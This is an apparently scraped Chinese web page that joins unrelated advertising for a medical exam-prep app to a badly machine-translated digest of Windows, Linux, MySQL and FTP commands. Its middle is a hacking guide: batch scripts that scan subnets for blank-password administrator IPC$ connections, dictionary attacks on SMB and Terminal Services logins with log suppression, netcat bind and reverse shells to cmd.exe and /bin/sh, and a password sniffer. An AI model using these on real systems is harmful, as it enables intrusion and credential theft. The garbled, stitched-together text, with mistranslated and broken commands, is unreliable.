Cmd命令百科:计算机专家必须知道的win10 cmd命令摘要
中国教育简介。
中宇教育电脑版是一个与医学相关的知识教育平台。平台有海量的知识和教育资源给大家,帮助用户在平台上学习和稳定知识。界面上的教育可以分类。通过平台上的知识类型,可以选择需要学习的科目,帮助用户复习考试。中宇教育是集医师资格考试、药师资格考试、中医技术培训、考研、健康管理师、学历教育等教学科研为一体的专业大型考前辅导机构。
中域教育软件的功能
1、错题集训练
允许专业知识的盲区,保持训练。
2.考试中的紧迫问题
考试中的关键题,数据分析,必考题一定在其中,通过率在90%以上!
3、章节目录培训控制模块
整个考点涵盖习题和试题,由数十名教研员进行分析和解答;
4、日历年测试控制模块
历年考题有近几年的统考试卷,统考模拟卷,实战演练。往年的考题都在这,随时随地都可以升级!
中宇教育软件的特点
【研究生课程互联网大数据】
全方位百度收录了中国历年考研题,考研真题,考研真题解析,更有国内名师精英团队产品研发的考研内容,方便大家记忆考研知识要点。考研题尽量给你一个深度的科研和对每个考点的把握。
【考研视频反馈活动】
全方位百度收录并直播考研课程视频,由名师庞晓云、余及其考研老师、碧海考研老师、考研老师、启航考研老师倾力出击,打造考研领域最在线课程,医学考研老师刘、等重磅消息,全方位考研视频精彩展现。
【高成功率研究生课程内容】
医学研究生最头疼的就是西医综合类研究生课程,中医综合类研究生课程,口腔专科,医学考研专科,非常全面。中档文化教育从一开始就擅长医学考研,中档考研老师对医学考研水平有个人见解。
【考研词汇英语巧妙回忆】
考研英语词汇大全,以及考研英语题库的巧妙笔记,结合5500个考研词汇。
中宇教育软件亮点
1.支持手机、电脑、iPad上课,在家就可以和老师互动;
2.大数据个性化教学,课件基于学生能力定制,课程匹配海量测试数据;
3.支持课程结束后无限播放。如果错过了课程或者没听懂,就回放一下,及时复习。选择中域的直播类!你选择了成功!
中宇教育更新日志
1.细节更出众!
2.虫子消失得无影无踪
Cmd命令百科:计算机专家必须知道的win10 cmd命令摘要
系统显示远程主机系统类型。
用户用户名[密码][帐户]使用不同的用户名再次登录远程主机。
Open host [port]重新建立新的连接。
提示交互提示模式
Macdef定义宏命令
lcd改变当前本地主机的工作目录,如果默认,将转到当前用户的主目录。
Chmod更改re的文件权限
显示数据库;显示数据库列表。一开始只有两个数据库:mysql和test。Mysql库很重要。它包含MYSQL系统信息。我们在修改密码和添加新用户的时候,其实都是用这个库来操作的。
使用mysql
显示表格;显示库中的数据表
描述表名;显示数据表的结构
创建数据库库名称;建一座图书馆
使用库名;
创建表格表名(字段设置列表);制造一只手表
删除数据库库名称;
删除表表名;删除数据库和删除表
从表名中删除;清除表中的记录
Select * from表名;在表格中显示记录
mysqldump-opt school . BBB up数据库:(命令在DOS的mysqlin目录下执行);注意:将数据库school备份到文件school.bbb,这是一个具有任意文件名的文本文件。打开看看会不会有新发现。
win2003系统下的新命令(实用部分):
shut down/参数关闭或重新启动本地或远程主机。
参数描述:/S关闭主机,/R重新启动主机,/T number设置延迟时间,范围从0到180秒,/A取消启动,/M //IP指定远程主机。
示例:shutdown /r /t 0立即重新启动本地主机(没有延迟)
task ill/参数进程名称或进程的pid终止一个或多个任务和进程。
参数说明:/pid要终止一个进程的pid,可以使用tasklist命令获取每个进程的pid,/IM要终止的进程的进程名,/F强制终止进程,/T终止指定的进程及其启动的子进程。
Tasklist显示当前在本地和远程主机上运行的进程、服务和服务进程的进程标识符(PID)。
参数说明:/M列出当前进程加载的dll文件,/SVC显示每个进程对应的服务,如果没有参数,则只列出当前进程。
linux系统下的基本命令注意:区分大小写。
Uname显示版本信息(与win2K的ver相同)
Dir显示当前目录文件,ls -al显示隐藏文件(与win2K的dir相同)。
Pwd查询当前目录位置。
Cd cd.回到上一个目录,注意cd和之间有一个空格.CD/返回到根目录。
卡特彼勒文件名查看文件内容
Cat abc.txt将内容写入abc.txt文件。
更多文件名逐页显示文本文件。
Cp复制文件
Mv移动文件
Rm文件名删除文件,RM-目录名删除目录和子目录。
Mkdir目录名创建目录
Rmdir删除子目录,目录中没有文档。
Chmod设置文件或目录的访问权限。
Grep在文件中查找字符串。
差异文件比较
查找文件搜索
日期当前日期和时间。
谁在查询目前和你用同一台机器的人以及登录的时间和地点。
w查询当前计算机用户的详细信息。
Whoami检查您的帐户名称。
群组查看某人的群组。
Passwd更改密码
历史,检查你自己的命令。
Ps显示进程状态。
Kill停止一个进程。
Gcc黑客通常用它来编译C语言编写的文件。
Su权限被转换为指定的用户。
Telnet IP telnet连接到另一台主机(同win2K),当bash$出现时,连接成功。
Ftp ftp连接到服务器(与win2K相同)。
批处理命令和变量
1.对于命令和变量的基本格式
FOR/parameter % variable in(set)docommand[command _ parameters]% variable:指定单字母可替换参数,如:%i,用:%%i指定变量,用:%i%调用变量,变量区分大小写(%i不等于%i)。
批处理一次可以处理10个变量,从%0到% 9,其中% 0默认用于批处理文件名,而%1是使用此批处理时输入的第一个值。同样,% 2-%9是指输入的第二到第九个值;示例:net use ipipc $ pass/user:用户中的ip为%1,pass为% 2,用户为%3。
(set):使用通配符指定一个文件或一组文件,例如(D:user.txt)和(11 254) (1-1 254)。{"(11 254)"第一个' 1 '指初始值,第二个' 1 '指增长量,第三个' 254 '“(1 -1 254)”描述:即从254到1}
Command:指定要在第一个文件上执行的命令,如:net use command如果要执行多个命令,可以通过添加以下命令来分隔这个房间:
Command_parameters:为特定命令指定参数或命令行开关。
IN (set):指(set)中的值;DO命令:指执行命令。
参数:/L是指增量形式{(set)是增量形式};/F是指从文件中连续取值,直到取完为止{(set)是文件,比如(d:pass.txt)}。
用法示例:
@关闭回声
Echo使用格式:test.bat *。*.* test.txt
对于/l%% g in (11 254) do echo% 1。% % gtest.txt netuse % 1。%% g/user: administrator | find '命令已成功完成' test.txt '
另存为test.bat描述:依次尝试为指定C类网段的254个IP建立管理员密码为空的IPC$连接。如果成功,将IP保存在test.txt中。
/L是指增量形式(即从1-254或254-1);输入的IP的前三位数字:*。*.*是批处理的默认% 1;%%G是变量(ip的最后一位);用于分隔echo和net use命令;|是指ipc$建立后,使用find检查结果中是否有“命令成功完成”信息;%1.%%G是一个完整的IP地址;(1 1 254)指初始值、增长额和结束值。
@关闭回声
Echo使用格式:ok.bat ip
为/F %%i IN (D:user.dic)做smb.exe % 1% % I D:pass . DIC 200
另存为:ok.exe描述:输入一个IP后,使用字典文件d:pass.dic解密d:user.dic中的用户密码,直到取完文件中的所有值。%%i是用户名;%1是输入的IP地址(默认)。
七:
2.If命令和变量的基本格式
IF [not] errorlevel数字命令语句如果程序最终返回一个等于或大于指定数字的退出代码,则指定条件为“真”。
示例:IF errorlevel 0命令是指返回值为0时程序执行后的命令;IF not errorlevel 1命令意味着如果程序执行返回的最后一个值不等于1,将执行下面的命令。
0表示找到并成功执行(真);1表示未找到,未实施(假)。
IF [not] string 1==string 2命令语句如果指定的文本字符串匹配(即string 1等于string 2),则执行以下命令。
示例:“如果' % 2%'=' 4' goto start”的意思是:如果输入的第二个变量是4,将执行以下命令(注意:调用变量时,% variable name%将加上' ')。
IF [not] exist文件名命令语句如果指定的文件名存在,下面的命令将被执行。
例如:“如果不是nc.exe格托恩德”的意思是:如果你找不到nc.exe的文件,跳到“结束”标签。
IF [not] errorlevel数字命令语句else命令语句或if [not] string 1==string 2命令语句else命令语句或IF [not] exist文件名命令语句else命令语句plus:else命令语句后,是指前一条件不成立时else行后的命令。注意:else必须在同一行上才有效。当有del命令时,需要把del命令的所有内容都括起来,因为del命令只有在单行时才能执行,用了以后就等于单行了;例如:“如果exist test . txt . else echo test . txt . missing”,注意“.”在命令中。
系统外部命令
注:系统外部命令(需要下载相关工具)
瑞士军刀:nc.exe
参数描述:
-h查看帮助信息
-三维背景模式
-e prog程序重定向,一旦连接,执行[危险]
isecs延迟间隔
-l监听模式,用于入站连接
-L监控模式,连接关闭后继续监控,直到CTR C。
-n IP地址,不是域名。
-o胶片记录十六进制传输。
-p[ space] port本地端口号
-r随机本地和远程端口
-t使用Telnet交互模式。
-u UDP模式
-v详细输出,用-vv会更详细。
-w数字超时延迟间隔
-z关闭输入和输出(当用于扫锚时)
基本用法:
Nc -nvv 192.168.0.1 80连接到192.168.0.1主机的端口80。
Nc -l -p 80打开本机的TCP 80端口监听。
Nc -nvv -w2 -z 192.168.0.1 80-1024扫锚192.168.0.1的80-1024端口。
NC-l-p 5354-t-e c:winntsystem32cmd.exe将远程主机的cmdshell绑定到远程主机的TCP 5354端口。
NC-t-e c:winntsystem32cmd.exe 192.168.0.2 5354设置远程主机的cmdshell,反向连接192 . 168 . 0 . 2的5354端口。
高级用法:
nc -L -p 80作为蜜罐,1: 0开启,一直监听80端口,直到CTR C。
Nc -L -p 80 c:log.txt作为蜜罐,一直监听端口80,直到CTR C,同时将结果输出到c:log.txt。
Nc -L -p 80 c:honeyport.txt作为蜜罐用3-1:打开并不断监听端口80直到CTR C,将c:honeyport.txt中的内容发送到管道中,也可以起到传输文件的作用。
Type.exe C:honey port | NC-L-P 80作为蜜罐3-2:打开并不断监听80端口直到CTR C,将c:honeyport.txt中的内容发送到管道中也可以起到传输文件的作用。
对于本机器:nc -l -p本地端口。
在另一台主机上:NC-e cmd.exe本地IP -p本地端口*win2K。
Nc -e /bin/sh本地IP -p本地端口*linux,unix反向连接突破对方主机的防火墙。
对于本机:nc -d -l -p本地端口要传输的文件的路径和名称。
在另一台主机上,使用nc -vv本地IP的本地端口中存储文件的路径和名称将文件传输到另一台主机。
注意:
管道命令
或者重定向命令。例如,tlntadmnttest.txt是指将test.txt的内容分配给tlntadmn命令。
@表示执行@后面的命令,但不会显示(后台执行);示例:@dir c:winnt d:log.txt的意思是:后台执行dir,并将结果保存在d:log.txt中。
“”和“”的区别是:覆盖;表示:保存到(添加到)。
例如,@dir c:winnt d:log.txt和@dir c:winnt d:log.txt两个命令执行两次。相比之下,第二个命令保存所有第二个结果,而第二个命令只有一个结果,因为第二个结果覆盖了第一个结果。
八:
扫描工具:xscan.exe
基本格式
Xscan -host Start IP[- End IP]检测项[其他选项]扫描锚‘Start IP to End IP’部分的所有主机信息。
Xscan -file主机列表文件名检测项目【其他选项】扫描锚‘主机IP列表文件名’中的所有主机信息。
试验项目
-active检测主机是否处于活动状态。
-操作系统检测远程操作系统类型(通过NETBIOS和SNMP协议)
-port检测常用服务的端口状态。
-ftp检测ftp弱密码
-pub检测FTP服务的匿名用户的写权限。
-pop3检测pop 3-服务器弱密码
-smtp检测smtp服务器漏洞
-sql检测SQL-Server弱密码
-smb检测到NT-Server弱密码。
-iis检测到iis编码/解码漏洞。
-cgi检测cgi漏洞
-nasl加载Nessus攻击脚本
-all检测以上所有项目。
其他选项
-i Adapter Number设置网络适配器,适配器号可以通过'-l '参数获得。
-l显示所有网络适配器。
-v显示详细的扫描进度。
-p跳过没有响应的主机。
-o跳过未检测到开放端口的主机。
-t并发线程数,并发主机数指定最大并发线程数和并发主机数。默认数字是100,10。
-log file name指定扫描报告的文件名(后缀为:TXT或HTML格式的文件)。
用法示例
xscan-host 192.168.1.1-192.168.255.255-all-active-p检测192 . 168 . 1 . 1-192 . 168 . 255 . 255网段中主机的所有漏洞,跳过无响应的主机。
xscan-host 192.168.1.1-192.168.255.255-port-sm B- t150-o检测192 . 168 . 1 . 1-192 . 168 . 255 . 255网段中主机的标准端口状态,nt弱密码用户,最大。
xscan-file hostlist.txt-port-CGI-t200,5-v-o检测“host list . txt”文件中列出的所有主机的标准端口状态,以及CGI漏洞。最大并发线程数为200,最多同时检测5台主机,显示详细的检测进度,跳过未检测到开放端口的主机。
九:
命令行嗅探器:xsniff.exe
可以捕获局域网中FTP/SMTP/POP3/HTTP协议的密码。
参数描述
-tcp输出tcp数据报
-udp输出udp数据报
-ICMP输出ICMP数据报
-传递过滤器密码信息。
-隐藏后台运行
-host解析主机名。
-addr IP地址过滤器IP地址
-端口端口过滤器端口
-log filename将输出保存到文件中。
ascII格式的ASC输出。
-十六进制形式的十六进制输出
用法示例
xsniff . exe-pass-hide-log pass.log在后台运行嗅探密码,并将密码信息保存在pass . log文件中。
xsniff . exe-tcp-udp-ASC-addr 192.168.1.1嗅探192 . 168 . 1 . 1并过滤TCP和UDP信息并以ASCII格式输出。
终端服务密码破解:tscrack.exe
参数描述
-h显示帮助。
-v显示版本信息。
-s在屏幕上播放解密的能力
-b密码错误时的声音。
-t both发送多个连接(多线程)
-N阻止目标服务器上的系统日志条目
-U卸载删除tscrack组件。
-f在-f后面使用密码。
-F间隔时间(频率)
-l在-l后面使用用户名。
-w在-w后使用密码字典。
-p在-p后面使用密码。
-D登录到主页
用法示例
t rack 192 . 168 . 0 . 1-l administrator-wpass . DIC用密码字典文件远程破解了主机的管理员的登录密码。
Tstrack 192.168.0.1-l管理员-p123456使用密码123456远程登录192.168.0.1的管理员用户。
@如果不存在ipcscan.txt转到noscan
@ for/f ' tokens=1 delims=' % % I in(3389 . txt)请务必调用hack.bat %%i
nscan
@echo 3389.txt没有找到或扫描失败
(保存为3389.bat)(假设用SuperScan或其他锚扫描器扫描一批3389的主机IP列表文件)。
3389.bat的意思是:从3389.txt文件中取一个IP,然后运行hack.bat。
@如果不存在,tscrack.exe去noscan
@ ts crack % 1-l administrator-w pass . DIC rouji . txt
:无扫描
@回声tscrack.exe没有找到或扫描失败
(另存为hack.bat)(运行3389.bat是可以的,3389.bat、hack.bat、3389.txt、pass.dic和tscrack.exe在同一个目录;可以等结果)
Hack.bat的意思是:运行tscrack.exe字典对3389.txt中所有主机的管理员密码进行破解,并将破解结果保存在rouji.txt文件中。
其他的
Shutdown.exe
关机IP地址T:20 20秒后自动关闭对方NT(Windows 2003系统自带工具,要下载这个工具才能在Windows2000下使用。它在之前的Windows 2003 DOS命令中有详细描述。)
Fpipe.exe(TCP端口重定向工具)将在第二部分详细介绍(端口重定向绕过防火墙)。
Fpipe -l 80 -s 1029 -r 80当有人扫描你的80端口时,他扫描的结果将完全是主机信息。
Fpipe -l 23 -s 88 -r 23目标IP通过端口将本地计算机发送的23端口Telnet请求重定向到目标IP,然后通过端口88发送到目标IP的23端口。(与目标IP建立Telnet时,机器会使用88端口与之连接)然后:直接Telnet 127.0.0.1(本地IP)会连接到目标IP的23端口。
OpenTelnet.exe(远程打开telnet工具)
Opentelnet.exe IP账号密码ntlm认证方式telnet端口(无需上传ntlm.exe破坏微软的认证方式)直接远程打开对方的Telnet服务后,就可以用telnet ip连接到对方。
NTLM身份验证方法:0:不使用NTLM身份验证;1:先尝试NTLM认证,失败后再使用用户名和密码;2:仅使用NTLM认证。
ResumeTelnet.exe(open telnet附带的另一个工具)
resumetelnet.exe IP账户的密码通过Telnet连接到对方后,使用该命令恢复对方的Telnet设置,同时关闭Telnet服务。
FTP命令的详细说明
FTP命令是互联网用户最常用的命令之一。熟悉并灵活应用FTP内部命令,可以极大地方便用户,事半功倍。如果你想学习使用FTP在后台下载,那么你必须学习FTP指令。
FTP的命令行格式是:
FTP-v-d-I-n-g[主机名],其中
-v显示远程服务器的所有响应信息。
-n限制ftp自动登录,即不使用;n etrc文件;
-d使用调试模式;
-g取消全局文件名。
FTP使用以下内部命令(括号表示选项):
1.[cmd[args]]:在本地机器执行交互shell,exit返回ftp环境,比如:ls*。活力
2.$ macro-ame[args]:执行宏定义宏名。
3.account[password]:成功登录远程系统后,提供访问系统资源所需的补充密码。
4.追加本地文件[远程文件]:将本地文件追加到远程系统主机。如果未指定远程系统文件名,将使用本地文件名。
5.ascii:使用ascii类型的传输模式。
6 .铃:每执行一个命令,电脑就响一次。
7.bin:使用二进制文件传输模式。
8.bye:退出ftp会话过程。
9.case:使用mget时,将远程主机的文件名中的大写字母转换为小写字母。
10.输入远程主机目录。
11.cdup:输入远程主机目录的父目录。
12.chmod模式文件名:设置远程主机文件名的访问模式为mode,比如chmod 777a.out。
13.close:中断与远程服务器的ftp会话(对应open)。
14 .cr:在asscii模式下传输文件时,回车换行符被转换成一个回车行。
15 .删除远程文件:删除远程主机文件。
16.debug[debug-value]:设置调试模式,显示发送到远程主机的每个命令,比如deb up 3。如果设置为0,则意味着调试被取消。
17.dir[remote-dir][local-file]:显示远程主机目录并将结果存储在本地文件中。
18 .断开:与关闭相同。
19 .表单格式:设置文件传输模式为格式,默认为文件模式。
20 .获取远程文件[本地文件]:将远程主机的远程文件传输到本地硬盘的本地文件。
21.glob:设置mdelete、mget、mput的文件扩展名。默认情况下,文件名不扩展,这与命令行的-g参数相同。
22.hash:每传输1024个字节,显示一个散列符号(#)。
23.help[cmd]:显示ftp内部命令cmd的帮助信息,如:help get。
24.idle[seconds]:将远程服务器的睡眠计时器设置为[seconds]秒。
25.image:设置二进制传输模式(与二进制相同)。
26.lcd[dir]:将本地工作目录切换到dir。
27.ls[remote-dir][local-file]:显示远程目录remote-dir,并将其保存在本地文件local-file中。
28.macdef宏名:定义一个宏。当遇到macdef下的空行时,宏定义结束。
29.mdelete[remote-file]:删除远程主机文件。
30.mdir remote-files local-file:类似于dir,但是可以指定多个远程文件,比如mdir *。o *。zipoutfile。
31.mget remote-files:传输多个远程文件。
32.mkdir dir-name:在远程主机中创建目录。
33.mls remote-file local-file:与nlist相同,但是可以指定多个文件名。
34.mode[modename]:设置文件传输模式为modename,默认模式为流模式。
35.modtime文件名:显示远程主机文件的最后修改时间。
36.mput local-file:将多个文件传输到远程主机。
37 .较新的文件名:如果远程机器中文件名的修改时间晚于本地硬盘中同名文件的修改时间,文件将被重新传输。
38.nlist [remote-dir] [local-file]:显示远程主机目录的文件列表,并将其存储在本地硬盘的本地文件中。
39.nmap[inpattern outpattern]:设置文件名映射机制,使得文件中的某些字符在传输时会相互转换,比如nmap $1。$2.$3[$1, $2].[$2,$3],那么当传输文件a1.a2.a3时,文件名就会变成a1和a2。这个命令特别适合于远程主机是非UNIX机器的情况。
40.ntrans[inchars[outchars]]:设置文件名字符的翻译机制,比如ntrans1R,文件名LLL就会变成RRR。
41.open host[port]:建立到指定ftp服务器的连接,可以指定连接端口。
42 .被动:进入被动传输模式。
43 .提示:设置传输多个文件时的交互提示。
44 .代理ftp-cmd:在辅助控制连接中,执行ftp命令,这允许连接两个ftp服务器以在它们之间传输文件。第一个ftp命令必须打开,以便首先在两台服务器之间建立连接。
45.put local-file[remote-file]:将本地文件local-file发送到远程主机。
46.pwd:显示远程主机的当前工作目录。
47.quit:和bye一样,退出ftp会话。
引用arg1,arg2.将参数逐字发送到远程ftp服务器,如quote syst。
49.recv remote-file[local-file]:同get。
50.Reget remote-file [local-file]:类似于get,但是如果local-file存在,它将从上次传输中断处恢复。
51.rhelp[cmd-name]:向远程主机请求帮助。
52.rstatus[file-name]:如果没有指定文件名,则显示远程主机的状态,否则显示文件的状态。
53.rename[from][to]:更改远程主机文件名。
54 .重置:清除应答队列。
55 .重启标记:从指定的标记重启get或put,比如重启130。
rmdir dir-name:删除远程主机目录。
57.runique:将文件名设置为只存储一次。如果文件存在,添加后缀. 1, 2等。到原始文件。
58 .发送本地文件[远程文件]:与上传相同。
59.sendPORT:设置端口命令的使用。
60 .站点arg1,arg2.将参数作为site命令一字不差地发送到远程ftp主机。
61.size file-name:显示远程主机的文件大小,例如site idle 7200。
status:显示当前的ftp状态。
63.struct[struct-name]:将文件传输结构设置为struct-name,默认使用流结构。
64.sunique:将远程主机文件名存储设置为仅一个(对应runique)。
system:显示远程主机的操作系统类型。
66.tenex:将文件传输类型设置为所需的tenex机器类型。
67.tick:在传输过程中设置字节计数器。
68.trace:设置包跟踪。
69.type[type-name]:设置文件传输类型为type-name,默认为ascii,如type binary,设置二进制传输方式。
70.umask[newmask]:将远程服务器的默认umask设置为newmask,比如umask 3。
71.User User-name[password][account]:向远程主机表明您的身份。如果需要密码,必须输入,例如,用户anonymous my@email。
72.verbose:与命令行的-v参数相同,即设置详细报告模式,将ftp服务器的所有响应显示给用户,默认值为on。
73.[cmd]:同帮助。
